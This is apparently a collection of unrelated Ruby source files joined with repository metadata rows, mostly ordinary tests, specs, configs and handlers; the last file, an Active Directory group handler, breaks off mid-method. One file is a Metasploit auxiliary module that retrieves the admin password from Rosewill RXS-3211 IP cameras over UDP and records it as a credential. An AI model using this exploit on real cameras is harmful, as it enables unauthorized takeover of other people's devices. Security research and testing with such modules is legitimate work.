| 18.4 | 79 | 0.682971 |
e9a0bec56f7196cb05d134b978c19a616127ff9a | 6,272 | describe "hist" do
before do
Pry.history.clear
@hist = Pry.history
@str_output = StringIO.new
@t = pry_tester history: @hist do
# For looking at what hist pushes into the input stack. The implementation
# of this helper will definitely have to change at some point.
def next_input
@pry.input.string
end
end
end
it 'should replay history correctly (single item)' do
o = Object.new
@hist.push "@x = 10"
@hist.push "@y = 20"
@hist.push "@z = 30"
@t.push_binding o
@t.eval 'hist --replay -1'
expect(o.instance_variable_get(:@z)).to eq 30
end
it 'should replay a range of history correctly (range of items)' do
o = Object.new
@hist.push "@x = 10"
@hist.push "@y = 20"
@t.push_binding o
@t.eval 'hist --replay 0..2'
expect(@t.eval('[@x, @y]')).to eq [10, 20]
end
# this is to prevent a regression where input redirection is
# replaced by just appending to `eval_string`
it 'should replay a range of history correctly (range of commands)' do
@hist.push "cd 1"
@hist.push "cd 2"
@t.eval("hist --replay 0..2")
stack = @t.eval("Pad.stack = _pry_.binding_stack.dup")
expect(stack.map { |b| b.eval("self") }).to eq [TOPLEVEL_BINDING.eval("self"), 1, 2]
end
it 'should grep for correct lines in history' do
@hist.push "abby"
@hist.push "box"
@hist.push "button"
@hist.push "pepper"
@hist.push "orange"
@hist.push "grape"
@hist.push "def blah 1"
@hist.push "def boink 2"
@hist.push "place holder"
expect(@t.eval('hist --grep o')).to match(/\d:.*?box\n\d:.*?button\n\d:.*?orange/)
# test more than one word in a regex match (def blah)
expect(@t.eval('hist --grep def blah')).to match(/def blah 1/)
# test more than one word with leading white space in a regex match (def boink)
expect(@t.eval('hist --grep def boink')).to match(/def boink 2/)
end
it 'should return last N lines in history with --tail switch' do
("a".."z").each do |v|
@hist.push v
end
out = @t.eval 'hist --tail 3'
expect(out.each_line.count).to eq 3
expect(out).to match(/x\n\d+:.*y\n\d+:.*z/)
end
it "should start from beginning if tail number is longer than history" do
@hist.push 'Hyacinth'
out = @t.eval 'hist --tail'
expect(out).to match(/Hyacinth/)
end
it 'should apply --tail after --grep' do
@hist.push "print 1"
@hist.push "print 2"
@hist.push "puts 3"
@hist.push "print 4"
@hist.push "puts 5"
out = @t.eval 'hist --tail 2 --grep print'
expect(out.each_line.count).to eq 2
expect(out).to match(/\d:.*?print 2\n\d:.*?print 4/)
end
it 'should apply --head after --grep' do
@hist.push "puts 1"
@hist.push "print 2"
@hist.push "puts 3"
@hist.push "print 4"
@hist.push "print 5"
out = @t.eval 'hist --head 2 --grep print'
expect(out.each_line.count).to eq 2
expect(out).to match(/\d:.*?print 2\n\d:.*?print 4/)
end
# strangeness in this test is due to bug in Readline::HISTORY not
# always registering first line of input
it 'should return first N lines in history with --head switch' do
("a".."z").each do |v|
@hist.push v
end
out = @t.eval 'hist --head 4'
expect(out.each_line.count).to eq 4
expect(out).to match(/a\n\d+:.*b\n\d+:.*c/)
end
# strangeness in this test is due to bug in Readline::HISTORY not
# always registering first line of input
it 'should show lines between lines A and B with the --show switch' do
  ('a'..'z').each { |letter| @hist.push(letter) }

  range_output = @t.eval('hist --show 1..4')
  # An inclusive 1..4 range yields exactly four lines of output.
  expect(range_output.each_line.count).to eq 4
  expect(range_output).to match(/b\n\d+:.*c\n\d+:.*d/)
end
it "should store a call with `--replay` flag" do
@t.eval ":banzai"
@t.eval "hist --replay 1"
# The replay invocation itself must be recorded so that it shows up in
# subsequent `hist` output.
expect(@t.eval("hist")).to match(/hist --replay 1/)
end
it "should not contain lines produced by `--replay` flag" do
@t.eval ":banzai"
@t.eval ":geronimo"
@t.eval ":huzzah"
# Replaying lines 1..3 re-executes them, but history must afterwards hold
# only the original entries plus the replay command itself -- not the
# re-executed copies.
@t.eval("hist --replay 1..3")
output = @t.eval("hist")
expect(output).to eq "1: :banzai\n2: :geronimo\n3: :huzzah\n4: hist --replay 1..3\n"
end
it "should raise CommandError when index of `--replay` points out to another `hist --replay`" do
@t.eval ":banzai"
@t.eval "hist --replay 1"
# Replaying a replay would recurse indefinitely, so Pry refuses it.
expect { @t.eval "hist --replay 2" }.to raise_error(Pry::CommandError, /Replay index 2 points out to another replay call: `hist --replay 1`/)
end
it "should disallow execution of `--replay <i>` when CommandError raised" do
@t.eval "a = 0"
@t.eval "a += 1"
@t.eval "hist --replay 2"
expect { @t.eval "hist --replay 3" }.to raise_error Pry::CommandError
# The failed replay must not have re-run any code: `a` is still 2 and the
# history contains exactly the five successful entries.
expect(@t.eval("a")).to eq 2
expect(@t.eval("hist").lines.to_a.size).to eq 5
end
it "excludes Pry commands from the history with `-e` switch" do
@hist.push('a = 20')
@hist.push('ls')
# `ls` is a Pry command, so `-e` filters it out and only plain Ruby remains.
expect(pry_eval('hist -e')).to eq "1: a = 20\n"
end
describe "sessions" do
  before do
    # Point history at a known fixture file so the "previous session"
    # contents (:athos, :porthos, :aramis) are deterministic.
    @old_file = Pry.config.history.file
    Pry.config.history.file = File.expand_path('spec/fixtures/pry_history')
    @hist.load
  end

  after do
    # Restore the original history file so other examples are unaffected.
    Pry.config.history.file = @old_file
  end

  it "displays history only for current session" do
    @hist.push('hello')
    @hist.push('world')
    expect(@t.eval('hist')).to match(/1:\shello\n2:\sworld/)
  end

  # Fixed typo in the example description: "sesion" -> "session".
  it "displays all history (including the current session) with `--all` switch" do
    @hist.push('goodbye')
    @hist.push('world')

    output = @t.eval('hist --all')
    # Entries 1-3 come from the fixture file, 4-5 from this session.
    expect(output).to match(/1:\s:athos\n2:\s:porthos\n3:\s:aramis\n/)
    expect(output).to match(/4:\sgoodbye\n5:\sworld/)
  end

  it "should not display histignore words in history" do
    Pry.config.history.histignore = [
      "well",
      "hello",
      "beautiful",
      /show*/,
      "exit"
    ]

    @hist.push("well")
    @hist.push("hello")
    @hist.push("beautiful")
    @hist.push("why")
    @hist.push("so")
    @hist.push("serious?")
    @hist.push("show-method")
    @hist.push("exit")

    output = @t.eval("hist")
    # Only entries not matching any histignore pattern survive.
    expect(output).to match(/1:\swhy\n2:\sso\n3:\sserious\?\n/)
  end
end
end
| 28.38009 | 145 | 0.602838 |
f7a4b473f8eaf28cc78916450152ecbe3ff430d4 | 1,138 | require_relative "../test_helper"
class I18nIntegrationTest < ActionDispatch::IntegrationTest
  # Recursively flattens a nested translation hash into a list of dotted
  # key paths (e.g. ".activerecord.errors.messages"), including every
  # intermediate namespace as well as the leaf keys.
  def collect_combined_keys(hash, ns = nil)
    hash.flat_map do |key, value|
      qualified = "#{ns}.#{key}"
      children = value.is_a?(Hash) ? collect_combined_keys(value, qualified) : []
      children + [qualified]
    end
  end

  # Every locale file must define exactly the same key set as the English
  # reference locale -- nothing missing, nothing extra.
  def test_translations
    locales_path = File.expand_path("../../../config/locales", __FILE__)
    locales = Dir.glob("#{locales_path}/*.yml").map do |file_path|
      File.basename(file_path, ".yml")
    end

    # Collect the flattened key list for each available locale.
    locale_keys = locales.each_with_object({}) do |locale, collected|
      translations = YAML.load_file("#{locales_path}/#{locale}.yml")
      collected[locale] = collect_combined_keys(translations[locale])
    end

    # Using en as reference
    reference = locale_keys[locales.delete("en")]
    assert reference.present?

    locale_keys.each do |locale, keys|
      missing = reference - keys
      assert missing.blank?, "#{locale} locale is missing: #{missing.join(', ')}"

      extra = keys - reference
      assert extra.blank?, "#{locale} locale has extra: #{extra.join(', ')}"
    end
  end
end
| 29.179487 | 81 | 0.644112 |
f81be91217b7b2049619438cba48550f8752b781 | 1,226 | module Padrino
module WebSockets
module SpiderGazelle
module Routing
require 'spider-gazelle/upgrades/websocket'
##
# Creates a WebSocket endpoint using SpiderGazelle + libuv.
#
# It handles upgrading the HTTP connection for you.
# You can nest this inside controllers as you would do with regular actions in Padrino.
#
# Registers a GET route at +channel+ that upgrades matching requests to a
# WebSocket via Rack hijacking; non-WebSocket requests fall through to the
# next matching route.
def websocket(channel, *args, &block)
get channel, *args do
# Let some other action try to handle the request if it's not a WebSocket.
throw :pass unless request.env['rack.hijack']
# Capture the Padrino route context so event callbacks can use helpers,
# params, sessions, etc.
event_context = self
# A :channel route parameter (e.g. "/ws/:channel") overrides the static
# channel name the endpoint was registered with.
ws_channel = params[:channel] || channel
# It's a WebSocket. Get the libuv promise and manage its events
request.env['rack.hijack'].call.then do |hijacked|
# Wrap the hijacked raw socket in SpiderGazelle's WebSocket handler.
ws = ::SpiderGazelle::Websocket.new hijacked.socket, hijacked.env
set_websocket_user
Padrino::WebSockets::SpiderGazelle::EventManager.new(
ws_channel, session['websocket_user'], ws, event_context, &block)
# Begin reading frames; events are dispatched to the manager above.
ws.start
end
end
end
alias :ws :websocket
end
end
end
end
| 32.263158 | 95 | 0.601142 |
21ce84e10f0c4652a1ec4d93d48d427652263093 | 14 | json.msg @msg
| 7 | 13 | 0.714286 |
798ea1f73827bb85f5d9b064f2fc5c9958ceb758 | 2,807 | RSpec.shared_examples_for 'all client drafts' do
# Shared assertion helper: verifies the handshake serialises to the expected
# client request, then feeds it the canned server response and expects a
# finished, valid handshake with no error.
# NOTE(review): relies on `handshake`, `client_request` and `server_response`
# being provided by the spec that includes these shared examples.
def validate_request
expect(handshake.to_s).to eql(client_request)
handshake << server_response
expect(handshake.error).to be_nil
expect(handshake).to be_finished
expect(handshake).to be_valid
end
# Feeding the canned server response should complete the handshake cleanly.
it 'is valid' do
handshake << server_response
expect(handshake.error).to be_nil
expect(handshake).to be_finished
expect(handshake).to be_valid
end
# The handshake reports the protocol draft version under test.
it 'returns valid version' do
expect(handshake.version).to eql(version)
end
# @request_params is presumably consumed when the shared `handshake` is
# built -- see the including spec. Setting :host here configures it.
it 'returns valid host' do
@request_params = { host: 'www.test.cc' }
expect(handshake.host).to eql('www.test.cc')
end
# The :path request parameter is exposed via #path.
it 'returns valid path' do
@request_params = { path: '/custom' }
expect(handshake.path).to eql('/custom')
end
# The :query request parameter is exposed via #query.
it 'returns valid query' do
@request_params = { query: 'aaa=bbb' }
expect(handshake.query).to eql('aaa=bbb')
end
# The :port request parameter is exposed via #port.
it 'returns valid port' do
@request_params = { port: 123 }
expect(handshake.port).to be(123)
end
# Custom headers round-trip unchanged through the handshake.
it 'returns valid headers' do
@request_params = { headers: { 'aaa' => 'bbb' } }
expect(handshake.headers).to eql('aaa' => 'bbb')
end
# A full ws:// URI passed as :uri is decomposed into host/port/path/query.
it 'parses uri' do
@request_params = { uri: 'ws://test.example.org:301/test_path?query=true' }
expect(handshake.host).to eql('test.example.org')
expect(handshake.port).to be(301)
expect(handshake.path).to eql('/test_path')
expect(handshake.query).to eql('query=true')
end
# :url is accepted as an alias for :uri and parsed identically.
it 'parses url' do
@request_params = { url: 'ws://test.example.org:301/test_path?query=true' }
expect(handshake.host).to eql('test.example.org')
expect(handshake.port).to be(301)
expect(handshake.path).to eql('/test_path')
expect(handshake.query).to eql('query=true')
end
# A URL with no explicit path defaults to "/".
it 'resolves correct path with root server provided' do
@request_params = { url: 'ws://test.example.org' }
expect(handshake.path).to eql('/')
end
# Baseline: default parameters produce a valid request/response exchange.
it 'returns valid response' do
validate_request
end
# A custom path still yields a valid handshake exchange.
it 'allows custom path' do
@request_params = { path: '/custom' }
validate_request
end
# A query string alongside the path still yields a valid handshake exchange.
it 'allows query in path' do
@request_params = { query: 'test=true' }
validate_request
end
# A non-default port still yields a valid handshake exchange.
it 'allows custom port' do
@request_params = { port: 123 }
validate_request
end
# Extra request headers still yield a valid handshake exchange.
it 'allows custom headers' do
@request_params = { headers: { 'aaa' => 'bbb' } }
validate_request
end
# A truncated server response must leave the handshake unfinished/invalid.
it 'recognizes unfinished requests' do
handshake << server_response[0..-20]
expect(handshake).not_to be_finished
expect(handshake).not_to be_valid
end
# A non-101 status code finishes the handshake but marks it invalid with a
# specific error symbol.
it 'disallows requests with invalid request method' do
handshake << server_response.gsub('101', '404')
expect(handshake).to be_finished
expect(handshake).not_to be_valid
expect(handshake.error).to be(:invalid_status_code)
end
end
| 25.752294 | 79 | 0.676167 |
5de50d297c1f363738e815870f7d7d8e110cb5bb | 5,512 | # @file TestSBMLDocument.rb
# @brief SBMLDocument unit tests
#
# @author Akiya Jouraku (Ruby conversion)
# @author Ben Bornstein
#
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestSBMLDocument.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
require 'test/unit'
require 'libSBML'
# NOTE(review): per the file header this file is auto-generated from the
# libSBML C test suite ("DO NOT EDIT THIS FILE"); comments below are review
# annotations only and would be lost on regeneration.
class TestSBMLDocument < Test::Unit::TestCase
# A default document is an empty SBML Level 3 Version 1 container.
def test_SBMLDocument_create
d = LibSBML::SBMLDocument.new()
assert( d.getTypeCode() == LibSBML::SBML_DOCUMENT )
assert( d.getNotes() == nil )
assert( d.getAnnotation() == nil )
assert( d.getLevel() == 3 )
assert( d.getVersion() == 1 )
assert( d.getNumErrors() == 0 )
d = nil
end
# Explicit level/version arguments are honoured by the constructor.
def test_SBMLDocument_createWith
d = LibSBML::SBMLDocument.new(1,2)
assert( d.getTypeCode() == LibSBML::SBML_DOCUMENT )
assert( d.getNotes() == nil )
assert( d.getAnnotation() == nil )
assert( d.getLevel() == 1 )
assert( d.getVersion() == 2 )
assert( d.getNumErrors() == 0 )
d = nil
end
# Intentionally empty: the C original checks that freeing NULL is a no-op,
# which has no Ruby equivalent.
def test_SBMLDocument_free_NULL
end
# Conversions between supported level/version pairs succeed; L1V1 fails.
def test_SBMLDocument_setLevelAndVersion
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
d.setModel(m1)
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(2,1,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
# With strict checking, a unit carrying an offset (only legal in L2V1)
# blocks conversion to every other level/version.
def test_SBMLDocument_setLevelAndVersion_Error
d = LibSBML::SBMLDocument.new()
d.setLevelAndVersion(2,1,true)
m1 = LibSBML::Model.new(2,1)
u = LibSBML::Unit.new(2,1)
u.setKind(LibSBML::UnitKind_forName("mole"))
u.setOffset(3.2)
ud = LibSBML::UnitDefinition.new(2,1)
ud.setId( "ud")
ud.addUnit(u)
m1.addUnitDefinition(ud)
d.setModel(m1)
assert( d.setLevelAndVersion(2,2,true) == false )
assert( d.setLevelAndVersion(2,3,true) == false )
assert( d.setLevelAndVersion(1,2,true) == false )
assert( d.setLevelAndVersion(1,1,true) == false )
d = nil
end
# Without strict checking, unit consistency problems do not block
# conversion (except to unsupported L1V1).
def test_SBMLDocument_setLevelAndVersion_UnitsError
d = LibSBML::SBMLDocument.new()
d.setLevelAndVersion(2,4,false)
m1 = d.createModel()
c = m1.createCompartment()
c.setId( "c")
p = m1.createParameter()
p.setId( "p")
p.setUnits( "mole")
r = m1.createAssignmentRule()
r.setVariable( "c")
r.setFormula( "p*p")
assert( d.setLevelAndVersion(2,2,false) == true )
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
# An SBO term (introduced in L2V2) only produces a warning, so non-strict
# conversion still succeeds where the target level/version is supported.
def test_SBMLDocument_setLevelAndVersion_Warning
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
(m1).setSBOTerm(2)
d.setModel(m1)
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(2,1,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
# setModel stores a *copy*: the accessor never returns the same object
# that was passed in.
def test_SBMLDocument_setModel
d = LibSBML::SBMLDocument.new(2,4)
m1 = LibSBML::Model.new(2,4)
m2 = LibSBML::Model.new(2,4)
assert( d.getModel() == nil )
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m1 )
i = d.setModel(d.getModel())
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m1 )
i = d.setModel(m2)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m2 )
d = nil
end
# A model whose version differs from the document's is rejected.
def test_SBMLDocument_setModel1
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,1)
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_VERSION_MISMATCH )
assert( d.getModel() == nil )
d = nil
end
# A model whose level differs from the document's is rejected.
def test_SBMLDocument_setModel2
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(1,2)
m1.createCompartment()
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_LEVEL_MISMATCH )
assert( d.getModel() == nil )
d = nil
end
# A model with matching level/version is accepted.
def test_SBMLDocument_setModel3
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
assert( d.getModel() != nil )
d = nil
end
end
| 31.678161 | 79 | 0.642598 |
1db5205051497860418ece1180debf2922bf6526 | 2,454 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require_relative '../legacy_spec_helper'
describe Status, type: :model do
fixtures :all
it 'should create' do
status = Status.new name: 'Assigned'
assert !status.save
# status name uniqueness
assert_equal 1, status.errors.count
status.name = 'Test Status'
assert status.save
assert !status.is_default
end
it 'should destroy' do
status = Status.find(3)
assert_difference 'Status.count', -1 do
assert status.destroy
end
assert_equal 0, Workflow.where(old_status_id: status.id).count
assert_equal 0, Workflow.where(new_status_id: status.id).count
end
it 'should destroy status in use' do
# Status assigned to an Issue
status = WorkPackage.find(1).status
assert_raises(RuntimeError, "Can't delete status") { status.destroy }
end
it 'should change default' do
status = Status.find(2)
assert !status.is_default
status.is_default = true
assert status.save
status.reload
assert_equal status, Status.default
assert !Status.find(1).is_default
end
it 'should reorder should not clear default status' do
status = Status.default
status.move_to_bottom
status.reload
assert status.is_default?
end
end
| 30.675 | 91 | 0.732681 |
034bfd2784482a68a6369fe285f959123d9717e8 | 585 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::Security::ConfigurationHelper do
let(:current_user) { create(:user) }
describe 'security_upgrade_path' do
subject { security_upgrade_path }
it { is_expected.to eq("https://#{ApplicationHelper.promo_host}/pricing/") }
end
describe 'vulnerability_training_docs_path' do
subject { helper.vulnerability_training_docs_path }
it { is_expected.to eq(help_page_path('user/application_security/vulnerabilities/index', anchor: 'enable-security-training-for-vulnerabilities')) }
end
end
| 29.25 | 151 | 0.769231 |
b9edb0974630a19bf0574e86d01c4dcb5607a625 | 3,513 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever',
'Description' => %q{
This module takes advantage of a protocol design issue with the Rosewill admin
executable in order to retrieve passwords, allowing remote attackers to take
administrative control over the device. Other similar IP Cameras such as Edimax,
Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
The protocol deisgn issue also allows attackers to reset passwords on the device.
},
'Author' => 'Ben Schmidt',
'References' =>
[
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::CHOST,
Opt::RPORT(13364),
], self.class)
end
def run_host(ip)
#Protocol
target_mac = "\xff\xff\xff\xff\xff\xff"
cmd = "\x00" #Request
cmd << "\x06\xff\xf9" #Type
password = nil
begin
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_sock = Rex::Socket::Udp.create( {
'LocalHost' => datastore['CHOST'] || nil,
'PeerHost' => ip,
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
})
udp_sock.put(target_mac+cmd)
res = udp_sock.recvfrom(65535, 0.5) and res[1]
#Parse the reply if we get a response
if res
password = parse_reply(res)
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error("Connection error")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
udp_sock.close if udp_sock
end
#Store the password if the parser returns something
if password
print_status("Password retrieved: #{password.to_s}")
report_cred(
ip: rhost,
port: rport,
service_name: 'ipcam',
user: '',
password: password,
proof: password
)
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def parse_reply(pkt)
@results ||= {}
# Ignore "empty" packets
return nil if not pkt[1]
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"
end
end
| 26.216418 | 96 | 0.603473 |
b934cea575f20631c62f5ff37ad0538e899b92ca | 235 | # encoding: utf-8
# Refinery i18n initializer: English is the only available locale and is
# used as the default for both the frontend and the admin backend.
Refinery::I18n.configure do |config|
config.default_locale = :en
config.current_locale = :en
config.default_frontend_locale = :en
config.frontend_locales = [:en]
config.locales = {:en=>"English"}
end
| 16.785714 | 38 | 0.702128 |
6a66b38d486026c3842ba1e991743a0a72381aec | 152 | class CreateItems < ActiveRecord::Migration[6.1]
# Reversible migration step: creates the `items` table with a string name
# column and the standard created_at/updated_at timestamps.
def change
create_table :items do |t|
t.string :name
t.timestamps
end
end
end
| 15.2 | 48 | 0.651316 |
1ce24fe85f51be69bb1671ad0aca3033a4577ee0 | 185 | namespace :db do
desc "Upload config/database.yml"
# Relative path used both locally (source) and under the remote shared
# directory (destination).
path = "config/database.yml"
task :upload do
on roles(:db) do
# Push the local database config to each db-role host's shared path.
upload!(path, shared_path.join(path))
end
end
end
| 18.5 | 43 | 0.659459 |
26dd5260d59e6079e5799b51966d7def2786160e | 1,369 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe 'client#ml.get_memory_stats' do
# Expected positional arguments of the underlying perform_request call:
# HTTP verb, URL, params, body, headers.
let(:expected_args) do
[
'GET',
url,
{},
nil,
{}
]
end
context 'without a node id' do
let(:url) { '_ml/memory/_stats' }
it 'performs the request' do
expect(client_double.ml.get_memory_stats).to be_a Elasticsearch::API::Response
end
end
context 'with a node id' do
# The node id is interpolated into the stats URL path.
let(:url) { '_ml/memory/foo/_stats' }
it 'performs the request' do
expect(client_double.ml.get_memory_stats(node_id: 'foo')).to be_a Elasticsearch::API::Response
end
end
end
| 28.520833 | 100 | 0.711468 |
0856e431377d4e601cbd466e24ea1aff0a8bd7a4 | 924 | require "rails_helper"
# Verifies the standard JSON REST routes for users under /api/v1.
RSpec.describe Api::V1::UsersController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(get: "/api/v1/users").to route_to("api/v1/users#index", format: :json)
end
it "routes to #show" do
expect(get: "/api/v1/users/1").to route_to("api/v1/users#show", id: "1", format: :json)
end
it "routes to #create" do
expect(post: "/api/v1/users").to route_to("api/v1/users#create", format: :json)
end
# Both PUT and PATCH map to #update.
it "routes to #update via PUT" do
expect(put: "/api/v1/users/1").to route_to("api/v1/users#update", id: "1", format: :json)
end
it "routes to #update via PATCH" do
expect(patch: "/api/v1/users/1").to route_to("api/v1/users#update", id: "1", format: :json)
end
it "routes to #destroy" do
expect(delete: "/api/v1/users/1").to route_to("api/v1/users#destroy", id: "1", format: :json)
end
end
end
| 30.8 | 99 | 0.623377 |
ab50d2f3730a7cb1283f4d69618ba5a3fbea0221 | 9,191 | # Add the dependencies file to require vendor libs
require File.expand_path(File.join(File.dirname(__FILE__), 'dependencies'))
class ActiveDirectoryComputerRemoveGroupsV1
# Prepare for execution by configuring the initial LDAP configuration,
# initializing Hash objects for necessary values, and validate the present
# state. This method sets the following instance variables:
# * @input_document - A REXML::Document object that represents the input XML.
# * @info_values - A Hash of task definition info item names to values.
# * @debug_logging_enabled - A Boolean value indicating whether logging should
# be enabled or disabled.
# * @parameters - A Hash of parameter names to parameter values.
# * @search_by - Determines the attribute to search for the computer.
# * @group_names - A list of groups to add to the computer.
#
# ==== Parameters
# * +input+ - The String of Xml that was built by evaluating the node.xml
# handler template.
def initialize(input)
# Construct an xml document to extract the parameters from the input string
@input_document = REXML::Document.new(input)
# Hash to hold the task info values
@info_values = {}
# Load the task info values
REXML::XPath.each(@input_document,"/handler/infos/info") { |item|
@info_values[item.attributes['name']] = item.text }
# Create the ldap object to interact with the active directory server
# (simple bind with the credentials from the task info values).
@ldap = Net::LDAP.new(
:host => @info_values['host'],
:port => @info_values['port'],
:auth => {
:method => :simple,
:username => @info_values['username'],
:password => @info_values['password']
}
)
# Determine if debug logging is enabled.
@debug_logging_enabled = @info_values['enable_debug_logging'] == 'Yes'
if @debug_logging_enabled
puts("Debug logging enabled...")
puts("Connecting to #{@info_values['host']}:#{@info_values['port']} as #{@info_values['username']}.")
puts("Using #{@info_values['base']} for the base of the directory tree.")
end
# Store parameters in the node.xml in a hash attribute named @parameters.
@parameters = {}
REXML::XPath.each(@input_document, '/handler/parameters/parameter') { |node|
@parameters[node.attributes['name']] = node.text
}
puts("Parameters: #{@parameters.inspect}") if @debug_logging_enabled
# First locate the computer entry and set the @search_by to the actual attribute name
# for the search filter
# Currently only "Computer Name" (cn) is supported; anything else is a
# configuration error and fails fast.
if @parameters['search_by'] == "Computer Name"
@search_by = 'cn'
else
raise "Unknown search attribute for computer: #{@parameters['search_by']}"
end
# Create an array of group names to add to the user by splitting the
# 'groups' parameter on any combination of spaces followed by a comma
# followed by any number of spaces.
@group_names = @parameters['groups'].split(%r{\s*,\s*})
end
# Searches for the user in the Active Directory server based on the search
# parameters starting with a filter for organizationalPerson, then adds the
# list of groups to the user
#
# This is a required method that is automatically called by the Kinetic Task
# Engine.
#
# ==== Returns
# An Xml formatted String representing the return variable results.
# Binds to Active Directory, locates the single computer entry matching the
# configured search attribute/value, resolves each requested group, and
# removes the computer's DN from every group's member attribute.
#
# Raises if the bind fails, the computer cannot be uniquely identified, any
# group cannot be found, or any group-membership removal fails (listing the
# groups that did and did not succeed).
#
# ==== Returns
# An Xml formatted String representing the return variable results.
def execute()
  # If we are successful in authenticating using the active directory
  # server and credentials specified by the task info values.
  if @ldap.bind
    # Build a filter to search by
    filter = Net::LDAP::Filter.eq( "objectclass", "computer" )
    # Add the search value (attribute) to the filter for the search
    unless @parameters['search_value'].nil?
      filter = filter & Net::LDAP::Filter.eq(@search_by, @parameters['search_value'])
    end

    # Search operation - return result is set to true so that an array is
    # returned (to determine if search matches more than one entry)
    user_entries = @ldap.search(
      :base => @info_values['base'],
      :filter => filter,
      :size => 2,
      :return_result => true
    )
    # Raise an exception if there was a problem with the call
    unless @ldap.get_operation_result.code == 0
      raise @ldap.get_operation_result.message
    end
    # Raise exception if search did not return 1 entry
    if user_entries.length < 1
      raise "Computer not found when searching by #{@search_by} for: #{@parameters['search_value']}"
    elsif user_entries.length > 1
      raise "Search matched more than one entry when searching by #{@search_by} for: #{@parameters['search_value']}"
    end

    # Determine the computers distinguished name
